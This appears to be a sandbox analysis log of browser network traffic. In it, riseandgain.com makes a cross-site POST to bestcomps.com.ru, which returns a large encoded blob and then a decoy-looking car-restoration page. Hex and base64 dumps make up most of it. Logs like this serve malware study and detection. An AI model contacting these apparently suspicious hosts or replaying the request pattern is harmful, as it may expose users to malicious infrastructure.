                                                cf-chl-out: ddjCBG/Vgf99tReXyBxtMpuuzQR3utxa01UVM0L/3oc/Hey00O6g1PPGLZeI3ZBWIQhWInyMpT2p7t2QYNCEepQ2041j3dX5meFiAvhE5L5IXZQ/YWvkt0UUJ5wFAob1bJoAP+PMUVMRNlnox4vEhSuUXbZ9fkl030pK22XgQZK8I2k5+TZduNZepZ4VOxbakHHe9rVlHdhtSOu5iQMa$um9nt2tEe1VnVxE/
                                                2024-08-20 13:42:08 UTC1183INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 54 2f 67 36 49 68 50 35 68 56 37 57 57 72 35 77 49 44 7a 6f 7a 51 61 2f 37 6b 73 7a 66 50 34 35 70 51 45 31 51 65 52 50 6e 31 67 59 49 2b 62 36 7a 33 6a 71 52 37 51 37 33 6f 6a 62 7a 66 45 52 34 65 4e 30 52 72 71 4e 34 68 2f 42 71 51 37 4c 2b 51 47 70 2b 6d 36 2f 37 37 4d 6a 6d 77 4b 32 77 41 2b 32 37 78 66 73 67 55 47 4f 67 43 39 41 36 61 53 51 65 72 74 54 45 72 2f 39 35 42 73 68 30 7a 6c 50 75 32 4b 4d 6e 43 41 59 62 57 43 41 78 46 52 50 64 52 57 77 37 54 6b 38 57 39 48 47 4f 76 38 39 73 39 36 74 72 39 52 4a 64 78 6a 2f 42 47 4f 43 2b 6e 5a 57 33 53 49 31 31 2f 48 6f 65 59 30 61 31 53 6e 6a 53 77 6d 61 62 5a 6e 51 6e 32 63 46 4b 6f 38 2f 4c 4c 49 35 45 4d 64 7a 37 53 59 65 54 56 43 32 79 74 4b 72 66 62 76 41 4e
                                                Data Ascii: cf-chl-out-s: T/g6IhP5hV7WWr5wIDzozQa/7kszfP45pQE1QeRPn1gYI+b6z3jqR7Q73ojbzfER4eN0RrqN4h/BqQ7L+QGp+m6/77MjmwK2wA+27xfsgUGOgC9A6aSQertTEr/95Bsh0zlPu2KMnCAYbWCAxFRPdRWw7Tk8W9HGOv89s96tr9RJdxj/BGOC+nZW3SI11/HoeY0a1SnjSwmabZnQn2cFKo8/LLI5EMdz7SYeTVC2ytKrfbvAN
                                                2024-08-20 13:42:08 UTC1177INData Raw: 74 34 39 33 6e 36 35 35 6e 6f 47 62 6b 61 61 48 70 61 72 49 79 4a 71 56 70 61 6e 4f 6b 5a 32 69 30 61 71 32 77 61 76 49 79 4b 4f 63 74 4b 6e 4f 6e 37 4b 2b 7a 62 61 2b 31 35 6d 6d 30 37 6d 33 71 74 65 38 72 4f 33 74 71 37 4f 72 38 4e 62 68 79 73 4c 72 75 37 54 6d 2b 38 30 41 36 2b 2f 68 76 63 54 6d 38 64 6f 4a 2b 4e 50 45 42 38 66 4c 45 4d 38 52 2f 65 59 46 42 65 4c 50 41 39 54 36 30 2f 48 74 37 75 2f 73 2f 67 54 61 35 66 58 32 34 43 63 54 36 53 72 73 47 2b 2f 6f 38 52 4d 65 43 76 34 6f 36 65 38 7a 39 42 58 30 4f 66 51 50 39 79 30 53 44 30 51 77 4d 54 49 64 49 7a 6b 55 54 41 34 71 48 30 34 6e 4f 30 73 64 53 68 5a 56 46 79 55 72 50 43 55 64 4e 6b 6b 61 58 46 42 53 56 30 56 69 59 57 52 54 53 79 49 38 4c 6d 5a 75 50 56 4d 76 59 55 74 73 63 6b 6c 42 62 6a 70
                                                Data Ascii: t493n655noGbkaaHparIyJqVpanOkZ2i0aq2wavIyKOctKnOn7K+zba+15mm07m3qte8rO3tq7Or8NbhysLru7Tm+80A6+/hvcTm8doJ+NPEB8fLEM8R/eYFBeLPA9T60/Ht7u/s/gTa5fX24CcT6SrsG+/o8RMeCv4o6e8z9BX0OfQP9y0SD0QwMTIdIzkUTA4qH04nO0sdShZVFyUrPCUdNkkaXFBSV0ViYWRTSyI8LmZuPVMvYUtscklBbjp
                                                2024-08-20 13:42:08 UTC1369INData Raw: 79 7a 75 49 52 45 55 37 2f 59 75 47 76 55 53 4c 68 6f 79 46 68 6b 65 51 52 73 7a 45 6b 55 64 47 53 52 4c 42 77 51 37 44 44 31 4c 4a 55 59 54 53 6a 5a 49 56 56 63 70 46 44 45 30 50 68 38 58 51 55 31 67 57 32 45 64 49 7a 31 42 52 43 5a 70 54 45 67 6e 57 30 6c 68 4d 43 64 42 62 48 68 77 59 7a 51 34 4f 57 6f 38 63 30 45 2f 51 6e 5a 59 50 48 5a 36 52 56 68 4c 53 47 46 6f 52 55 6c 6f 65 32 4f 52 6b 48 52 7a 6c 31 6c 70 6e 46 6c 62 6c 32 79 53 6e 58 32 6b 6c 6e 71 6a 6b 47 61 54 65 48 36 6f 67 71 36 4b 6e 57 31 38 62 71 53 77 64 4b 71 34 6a 35 69 4f 76 4a 4b 52 68 37 2b 74 76 36 37 44 77 62 65 66 79 48 75 56 6d 59 50 4a 79 36 71 4e 6b 5a 43 69 78 71 75 51 32 4a 69 75 79 36 69 63 6d 63 66 41 30 74 72 58 71 36 54 61 6e 4c 62 62 6d 38 48 4b 70 75 4b 6b 79 2f 44 47
                                                Data Ascii: yzuIREU7/YuGvUSLhoyFhkeQRszEkUdGSRLBwQ7DD1LJUYTSjZIVVcpFDE0Ph8XQU1gW2EdIz1BRCZpTEgnW0lhMCdBbHhwYzQ4OWo8c0E/QnZYPHZ6RVhLSGFoRUloe2ORkHRzl1lpnFlbl2ySnX2klnqjkGaTeH6ogq6KnW18bqSwdKq4j5iOvJKRh7+tv67DwbefyHuVmYPJy6qNkZCixquQ2Jiuy6icmcfA0trXq6TanLbbm8HKpuKky/DG
                                                2024-08-20 13:42:08 UTC870INData Raw: 4d 6d 46 76 76 75 48 42 33 2b 4c 69 45 4f 51 52 6f 63 42 54 73 30 42 79 4e 4a 4f 55 64 44 44 7a 70 44 48 6c 4d 70 4e 53 55 51 55 79 56 46 58 46 63 6f 45 56 78 4d 4d 56 49 67 47 7a 41 6a 5a 79 55 31 62 47 74 6f 53 57 30 6f 52 32 74 63 4d 58 46 7a 61 44 67 30 64 31 6f 31 65 46 46 31 4f 31 64 51 51 6f 46 5a 5a 45 52 46 4f 31 6c 39 52 48 68 36 53 34 4e 52 6b 33 4f 47 55 57 46 79 54 31 65 62 6b 4a 70 62 6e 32 68 58 69 34 31 5a 58 71 47 46 6e 36 69 67 67 47 65 66 61 4b 65 6f 72 36 79 4e 66 71 64 72 6a 57 39 79 6a 4c 4b 4f 71 57 2b 4a 69 6e 65 73 67 4c 61 32 73 4a 57 53 67 35 2b 33 75 59 69 4d 78 71 32 51 7a 62 36 79 30 4d 7a 44 77 39 57 71 70 4a 47 58 76 72 53 34 33 63 32 39 72 2b 47 6c 31 36 44 6f 76 4b 6a 49 33 38 48 62 79 4b 2b 6a 37 72 44 7a 31 73 6e 70 74
                                                Data Ascii: MmFvvuHB3+LiEOQRocBTs0ByNJOUdDDzpDHlMpNSUQUyVFXFcoEVxMMVIgGzAjZyU1bGtoSW0oR2tcMXFzaDg0d1o1eFF1O1dQQoFZZERFO1l9RHh6S4NRk3OGUWFyT1ebkJpbn2hXi41ZXqGFn6iggGefaKeor6yNfqdrjW9yjLKOqW+JinesgLa2sJWSg5+3uYiMxq2Qzb6y0MzDw9WqpJGXvrS43c29r+Gl16DovKjI38HbyK+j7rDz1snpt


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.1649762104.18.94.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:08 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:09 UTC379INHTTP/1.1 404 Not Found
                                                Date: Tue, 20 Aug 2024 13:42:08 GMT
                                                Content-Type: application/json
                                                Content-Length: 7
                                                Connection: close
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                cf-chl-out: AJ2daGsCWtxuzU6Nk0RMr3iusciyiRl6230=$s40hX0EcobrG0w4r
                                                Server: cloudflare
                                                CF-RAY: 8b62ce120e8942b9-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:09 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                Data Ascii: invalid


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.1649764188.114.97.34435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:09 UTC606OUTPOST // HTTP/1.1
                                                Host: bestcomps.com.ru
                                                Connection: keep-alive
                                                Content-Length: 16
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-platform: "Windows"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://riseandgain.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:09 UTC16OUTData Raw: 7b 22 7a 6f 6e 61 6c 22 3a 22 7a 65 72 6f 22 7d
                                                Data Ascii: {"zonal":"zero"}
                                                2024-08-20 13:42:12 UTC629INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:12 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NYJbINcedGtalf%2FoQSMThvAQ58z%2F2%2FU6s8PLM0B5wY7y50UZwDVEPR5qH2D%2FnuaKmdhhuCqN6jgYJ3JZAcMyRSnEzIlw7Evt%2Fa2tqVTm%2BCqtCRoG%2FMCVEva%2BkyQB0pjWi2VL"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b62ce17cd408c36-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:12 UTC740INData Raw: 34 39 35 61 0d 0a 7b 22 61 22 3a 22 79 6c 44 4c 68 4f 78 2b 38 6e 59 6d 44 74 6f 64 43 2b 75 38 54 32 75 66 49 71 6f 41 79 71 64 5a 4b 6b 6f 63 78 52 6d 4e 36 59 39 67 49 53 72 79 4c 30 72 75 6d 48 47 35 41 39 46 61 49 41 46 5a 6d 70 68 63 5a 37 65 73 46 31 59 34 44 52 72 48 45 4d 69 69 69 56 65 37 34 46 54 6a 56 65 72 59 53 34 35 64 64 4b 59 36 70 79 76 56 64 49 4e 54 55 39 4e 6d 50 79 72 4f 68 50 42 66 6e 78 4c 78 48 4f 7a 55 6c 4d 42 70 63 46 4f 58 30 62 47 6d 6e 4d 38 59 57 78 4d 70 45 39 73 5a 4b 75 51 35 4f 6b 66 6b 5a 48 6d 53 50 7a 71 70 54 4b 74 6f 59 34 74 75 57 39 79 48 71 48 41 66 59 32 53 70 31 32 68 37 4b 39 33 5c 2f 56 59 6c 43 47 6a 53 4f 4e 39 4b 78 76 6d 6e 32 59 6e 77 6f 57 43 70 51 78 4c 4b 4b 78 6b 53 76 72 73 4b 5c 2f 34 64 50 4f 35
                                                Data Ascii: 495a{"a":"ylDLhOx+8nYmDtodC+u8T2ufIqoAyqdZKkocxRmN6Y9gISryL0rumHG5A9FaIAFZmphcZ7esF1Y4DRrHEMiiiVe74FTjVerYS45ddKY6pyvVdINTU9NmPyrOhPBfnxLxHOzUlMBpcFOX0bGmnM8YWxMpE9sZKuQ5OkfkZHmSPzqpTKtoY4tuW9yHqHAfY2Sp12h7K93\/VYlCGjSON9Kxvmn2YnwoWCpQxLKKxkSvrsK\/4dPO5
                                                2024-08-20 13:42:12 UTC1369INData Raw: 4c 61 61 54 6e 5c 2f 63 52 57 5a 34 64 62 67 68 64 6d 5c 2f 55 52 36 62 58 6e 49 51 49 6d 51 67 49 32 67 58 56 4e 4a 4b 79 4b 57 5c 2f 62 59 72 42 33 70 31 71 74 5c 2f 66 7a 68 62 76 6e 6e 58 5c 2f 61 63 42 75 35 74 44 4f 67 32 4a 74 47 6e 38 32 79 48 6c 4c 50 6e 52 53 50 6d 7a 7a 37 4e 52 58 61 46 67 6e 71 2b 65 30 67 4c 72 38 6e 69 4c 6f 39 6b 45 69 4c 49 79 36 6c 55 7a 75 74 78 2b 43 73 37 50 38 55 38 71 41 73 61 6f 51 61 45 70 69 37 6a 41 42 63 41 72 57 4f 2b 79 75 71 59 5a 62 65 48 52 63 57 30 34 4c 7a 45 57 5a 32 63 57 33 55 79 5c 2f 66 5c 2f 61 76 34 72 4f 65 7a 61 57 55 2b 7a 57 4d 70 34 6a 6b 78 46 31 53 59 36 64 62 51 4e 76 75 73 6a 4b 2b 77 49 6d 64 52 50 30 49 79 64 7a 50 71 75 6a 79 70 34 33 72 54 68 5a 42 4d 62 36 39 45 74 45 45 39 57 65 71
                                                Data Ascii: LaaTn\/cRWZ4dbghdm\/UR6bXnIQImQgI2gXVNJKyKW\/bYrB3p1qt\/fzhbvnnX\/acBu5tDOg2JtGn82yHlLPnRSPmzz7NRXaFgnq+e0gLr8niLo9kEiLIy6lUzutx+Cs7P8U8qAsaoQaEpi7jABcArWO+yuqYZbeHRcW04LzEWZ2cW3Uy\/f\/av4rOezaWU+zWMp4jkxF1SY6dbQNvusjK+wImdRP0IydzPqujyp43rThZBMb69EtEE9Weq
                                                2024-08-20 13:42:12 UTC1369INData Raw: 78 30 61 4d 6d 68 2b 48 4c 39 4b 46 48 54 54 67 48 42 4f 54 30 55 44 5c 2f 4d 4a 2b 4e 46 2b 43 7a 73 71 73 50 51 4c 54 6d 4a 5c 2f 4a 46 4e 41 69 43 4f 4b 4b 6e 6c 48 71 43 57 49 32 70 65 34 4c 7a 67 6a 51 5c 2f 34 6a 37 56 4d 36 30 79 70 54 77 54 48 4a 68 6d 41 31 38 77 6a 74 4b 2b 6e 34 42 59 30 42 4d 31 6f 5a 2b 33 57 69 2b 7a 75 4d 52 56 6c 65 62 4f 4f 52 69 32 6d 75 55 32 78 37 78 4c 53 4f 6c 66 76 31 48 68 37 75 37 70 4e 53 6f 75 64 79 46 57 69 6b 41 34 4c 64 55 4b 76 63 30 67 34 78 6e 55 69 46 67 4a 67 47 33 4f 4a 63 53 44 54 72 44 70 54 61 6d 74 46 6d 7a 4b 6c 44 77 71 30 7a 51 38 70 44 33 4d 35 6a 35 76 4f 6b 51 4c 4b 43 6d 4e 4e 44 71 79 48 43 41 67 52 43 57 5a 32 6c 57 50 72 5c 2f 32 51 4d 56 4b 30 49 70 36 55 73 54 5c 2f 63 78 69 6b 7a 37 77
                                                Data Ascii: x0aMmh+HL9KFHTTgHBOT0UD\/MJ+NF+CzsqsPQLTmJ\/JFNAiCOKKnlHqCWI2pe4LzgjQ\/4j7VM60ypTwTHJhmA18wjtK+n4BY0BM1oZ+3Wi+zuMRVlebOORi2muU2x7xLSOlfv1Hh7u7pNSoudyFWikA4LdUKvc0g4xnUiFgJgG3OJcSDTrDpTamtFmzKlDwq0zQ8pD3M5j5vOkQLKCmNNDqyHCAgRCWZ2lWPr\/2QMVK0Ip6UsT\/cxikz7w
                                                2024-08-20 13:42:12 UTC1369INData Raw: 4f 44 71 48 52 58 48 44 41 43 6c 35 35 53 74 42 69 56 51 64 39 30 6f 51 43 4d 49 76 61 72 70 66 71 43 47 78 77 64 47 34 52 38 4a 44 50 5a 70 78 43 67 64 54 2b 4b 6c 69 62 4d 35 52 6e 33 47 38 77 42 37 53 53 4c 43 51 39 61 72 52 73 30 69 37 37 39 45 45 56 49 44 68 61 72 68 50 71 76 73 49 6a 70 73 70 4c 37 75 4f 31 39 33 37 4b 4f 5c 2f 7a 37 4b 49 49 73 6f 39 36 74 4f 70 34 32 45 35 78 45 6e 51 31 65 36 50 44 5c 2f 6a 6d 67 45 65 51 78 75 61 69 4a 68 64 56 39 6c 53 58 78 45 76 4d 69 4b 49 30 49 64 4b 70 41 36 38 74 42 74 64 70 47 47 32 5c 2f 52 44 41 4e 50 51 77 6e 46 44 73 33 4d 4b 65 74 51 49 5c 2f 7a 4a 7a 70 63 70 55 79 6b 54 66 4e 77 4b 61 54 63 5a 58 4c 65 4a 52 56 42 4b 63 44 71 4a 59 4f 73 46 30 52 45 71 52 64 46 37 54 4c 48 58 73 53 34 54 73 79 5c
                                                Data Ascii: ODqHRXHDACl55StBiVQd90oQCMIvarpfqCGxwdG4R8JDPZpxCgdT+KlibM5Rn3G8wB7SSLCQ9arRs0i779EEVIDharhPqvsIjpspL7uO1937KO\/z7KIIso96tOp42E5xEnQ1e6PD\/jmgEeQxuaiJhdV9lSXxEvMiKI0IdKpA68tBtdpGG2\/RDANPQwnFDs3MKetQI\/zJzpcpUykTfNwKaTcZXLeJRVBKcDqJYOsF0REqRdF7TLHXsS4Tsy\
                                                2024-08-20 13:42:12 UTC1369INData Raw: 6c 4d 33 47 2b 7a 63 65 36 6d 77 53 43 59 79 54 52 6d 76 2b 54 6a 30 69 6f 37 54 5a 42 39 41 4e 34 70 79 43 4b 71 31 69 4a 69 34 6a 6b 63 4a 5c 2f 6c 76 2b 77 76 35 68 50 53 49 53 6c 31 7a 49 49 67 2b 39 6c 45 4c 54 35 36 38 62 61 45 62 67 5c 2f 56 6b 70 79 79 4d 41 72 76 51 39 62 41 55 76 75 6c 2b 65 57 76 71 4c 41 30 42 44 55 36 46 47 5a 48 58 56 31 57 4c 36 6c 5c 2f 4a 38 63 70 4d 45 6d 47 52 58 6b 6d 5a 6d 71 4e 55 52 39 65 6d 6f 73 4f 4b 38 6d 2b 4a 5c 2f 61 69 53 33 73 42 73 2b 79 4f 4b 48 4d 5c 2f 34 4b 6d 75 34 6c 41 31 71 52 43 52 47 74 2b 33 61 35 62 4b 4b 75 76 4a 45 6b 4b 71 51 4c 4b 36 33 62 50 55 32 75 31 75 43 52 42 37 4e 61 72 49 4e 6e 68 5c 2f 78 30 61 6a 6d 49 39 73 71 34 78 52 56 62 4b 57 74 58 70 5a 51 77 46 52 34 31 66 4f 36 64 4c 2b
                                                Data Ascii: lM3G+zce6mwSCYyTRmv+Tj0io7TZB9AN4pyCKq1iJi4jkcJ\/lv+wv5hPSISl1zIIg+9lELT568baEbg\/VkpyyMArvQ9bAUvul+eWvqLA0BDU6FGZHXV1WL6l\/J8cpMEmGRXkmZmqNUR9emosOK8m+J\/aiS3sBs+yOKHM\/4Kmu4lA1qRCRGt+3a5bKKuvJEkKqQLK63bPU2u1uCRB7NarINnh\/x0ajmI9sq4xRVbKWtXpZQwFR41fO6dL+
                                                2024-08-20 13:42:12 UTC1369INData Raw: 50 73 48 42 6a 72 70 51 4d 78 4b 30 48 6a 35 56 56 61 38 30 4f 62 79 6f 58 70 56 49 74 45 47 54 4a 39 35 55 49 45 39 33 47 53 72 71 64 73 46 45 4d 74 6c 59 68 45 58 74 62 56 36 6f 52 53 5a 61 4b 67 53 6d 57 50 66 34 48 37 52 2b 72 66 4d 58 6f 68 62 4c 69 45 74 67 53 61 78 61 4f 67 4c 33 45 66 70 30 48 77 42 57 5a 7a 65 48 48 35 64 6c 45 6b 6c 43 62 43 48 61 45 43 78 4b 6a 2b 4b 66 41 47 59 76 37 5a 71 6d 35 6e 68 63 4e 62 37 73 65 59 59 45 6e 33 79 34 63 39 34 7a 49 7a 55 48 76 38 50 6e 38 54 78 79 70 4b 63 75 59 77 70 44 4c 44 61 47 6f 68 39 4d 47 6a 69 71 58 6e 6c 64 7a 6a 68 5a 6b 6d 65 43 69 30 5a 45 45 68 72 67 6e 73 4c 41 54 69 76 41 73 51 2b 2b 44 72 51 7a 79 78 56 75 73 5c 2f 7a 48 42 41 30 51 61 4c 41 7a 64 6e 6c 71 63 67 31 50 4a 63 62 54 34 6a
                                                Data Ascii: PsHBjrpQMxK0Hj5VVa80ObyoXpVItEGTJ95UIE93GSrqdsFEMtlYhEXtbV6oRSZaKgSmWPf4H7R+rfMXohbLiEtgSaxaOgL3Efp0HwBWZzeHH5dlEklCbCHaECxKj+KfAGYv7Zqm5nhcNb7seYYEn3y4c94zIzUHv8Pn8TxypKcuYwpDLDaGoh9MGjiqXnldzjhZkmeCi0ZEEhrgnsLATivAsQ++DrQzyxVus\/zHBA0QaLAzdnlqcg1PJcbT4j
                                                2024-08-20 13:42:12 UTC1369INData Raw: 58 61 39 71 58 79 4c 69 67 5a 73 39 51 6e 44 74 57 59 33 6e 69 4d 6c 78 42 56 71 68 4a 6e 73 57 41 71 5a 7a 33 41 62 31 39 2b 74 45 62 64 41 36 72 30 57 61 47 74 51 37 79 4b 6f 6c 31 6e 33 46 4d 68 4c 2b 54 51 35 74 37 35 6a 54 48 32 78 7a 38 4e 65 6e 63 69 49 6c 72 51 62 54 49 78 35 42 58 6c 6d 48 51 50 44 49 38 76 56 56 50 73 58 79 4e 30 53 39 73 4a 47 41 59 43 45 78 69 38 68 6c 37 49 41 34 35 71 46 6a 76 44 58 6c 5c 2f 46 32 49 43 30 79 41 66 78 66 55 36 49 69 50 65 72 55 44 69 36 34 4e 33 72 4e 77 6e 4e 62 6b 64 6b 52 5a 79 6b 56 64 78 48 50 4c 77 6e 36 74 76 72 6f 4e 53 45 79 6e 36 39 41 41 54 78 41 67 42 38 53 52 76 4a 50 4a 4a 75 33 71 4c 54 4d 6c 30 4f 4f 39 6e 75 51 54 38 62 76 31 50 6f 33 77 4a 68 76 6f 64 55 74 53 53 48 71 58 63 5a 57 41 51 61
                                                Data Ascii: Xa9qXyLigZs9QnDtWY3niMlxBVqhJnsWAqZz3Ab19+tEbdA6r0WaGtQ7yKol1n3FMhL+TQ5t75jTH2xz8NenciIlrQbTIx5BXlmHQPDI8vVVPsXyN0S9sJGAYCExi8hl7IA45qFjvDXl\/F2IC0yAfxfU6IiPerUDi64N3rNwnNbkdkRZykVdxHPLwn6tvroNSEyn69AATxAgB8SRvJPJJu3qLTMl0OO9nuQT8bv1Po3wJhvodUtSSHqXcZWAQa
                                                2024-08-20 13:42:12 UTC1369INData Raw: 46 4a 4e 5c 2f 71 6b 37 52 39 4e 57 45 6e 33 72 55 35 55 47 34 64 62 30 30 6e 53 59 48 61 74 58 4a 4d 44 66 38 62 4a 57 66 33 4c 5a 54 6e 56 77 47 79 46 6d 61 6c 44 79 4e 58 6c 57 46 69 34 79 7a 56 57 5c 2f 45 4b 56 46 64 54 36 69 4a 2b 4c 6b 46 66 50 51 56 38 62 61 54 42 79 44 43 6e 59 34 41 5a 48 2b 59 64 39 65 73 6d 73 5a 66 2b 6a 57 57 7a 58 66 64 65 64 67 55 4e 44 68 42 4c 42 50 42 55 49 6b 38 4b 6b 46 4b 36 44 5a 68 67 39 6e 38 4b 71 6c 66 4c 77 4f 2b 58 4b 67 63 64 44 73 4d 6c 6c 57 52 38 6a 74 66 4a 37 53 56 71 54 57 49 76 59 61 6f 50 69 73 57 79 72 4b 57 6d 6f 48 54 75 4d 6a 57 73 73 32 64 35 5c 2f 52 6f 31 4c 78 4c 61 79 55 74 6b 55 6b 55 6e 65 73 36 4e 64 31 34 53 71 7a 52 50 46 65 6b 4d 6d 49 4a 56 78 75 39 54 4f 64 59 52 4a 4b 62 7a 38 73 62
                                                Data Ascii: FJN\/qk7R9NWEn3rU5UG4db00nSYHatXJMDf8bJWf3LZTnVwGyFmalDyNXlWFi4yzVW\/EKVFdT6iJ+LkFfPQV8baTByDCnY4AZH+Yd9esmsZf+jWWzXfdedgUNDhBLBPBUIk8KkFK6DZhg9n8KqlfLwO+XKgcdDsMllWR8jtfJ7SVqTWIvYaoPisWyrKWmoHTuMjWss2d5\/Ro1LxLayUtkUkUnes6Nd14SqzRPFekMmIJVxu9TOdYRJKbz8sb
                                                2024-08-20 13:42:12 UTC1369INData Raw: 2b 5a 6f 73 57 55 32 52 69 6f 4c 36 64 6c 41 7a 56 30 64 62 46 51 6d 4e 50 55 46 75 6c 6d 58 6f 62 4f 73 74 39 6a 35 6c 72 69 51 67 34 54 56 53 67 2b 41 31 74 30 50 4b 70 2b 79 32 4d 62 38 73 72 4a 35 55 54 37 41 38 71 75 48 2b 4f 4e 55 4d 4b 41 35 5c 2f 2b 4b 6c 54 58 5a 50 58 2b 52 7a 51 4d 6d 76 65 69 6d 77 4d 38 35 70 58 67 50 77 67 2b 65 48 36 7a 58 34 43 63 45 6d 4a 6d 34 65 56 30 67 4b 51 75 65 59 38 64 6a 61 38 77 33 50 63 56 53 5c 2f 42 69 64 39 41 42 58 34 54 70 72 33 67 71 67 59 64 78 35 33 66 58 74 70 6b 79 59 75 72 51 35 56 6f 75 54 4e 77 56 4d 64 4f 4a 56 54 2b 77 4a 57 6b 4f 30 39 41 30 4a 6a 54 6a 67 4a 59 78 37 64 61 75 38 4c 69 42 4b 6a 57 67 6c 64 4a 6c 53 6b 38 69 65 47 46 48 32 4e 56 38 56 6a 5a 4e 2b 4f 70 57 68 74 6a 74 67 70 31 77
                                                Data Ascii: +ZosWU2RioL6dlAzV0dbFQmNPUFulmXobOst9j5lriQg4TVSg+A1t0PKp+y2Mb8srJ5UT7A8quH+ONUMKA5\/+KlTXZPX+RzQMmveimwM85pXgPwg+eH6zX4CcEmJm4eV0gKQueY8dja8w3PcVS\/Bid9ABX4Tpr3gqgYdx53fXtpkyYurQ5VouTNwVMdOJVT+wJWkO09A0JjTjgJYx7dau8LiBKjWgldJlSk8ieGFH2NV8VjZN+OpWhtjtgp1w


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.1649765188.114.96.34435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:13 UTC341OUTGET // HTTP/1.1
                                                Host: bestcomps.com.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:14 UTC633INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohMdhfuz7HptdRZoU8%2Fq0xxxrjXV9znPygaB9y%2FdbP%2Bx4bKxB%2FB2qd82Rcen8Ba7ZsnLXk%2FSgQiKIa4x1XT1oCGjff4jZ7%2BdwHwFbLKgKlXUArPstSQNL9PVZvWqpslqIgde"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b62ce305a5f334e-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:14 UTC736INData Raw: 31 61 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6c 61 73 73 69 63 20 43 61 72 20 52 65 73 74 6f 72 65 72 73 20 2d 20 62 65 73 74 63 6f 6d 70 73 2e 63 6f 6d 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f
                                                Data Ascii: 1aee<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Classic Car Restorers - bestcomps.com.ru</title> <link href="https://cdn.jsdelivr.net/
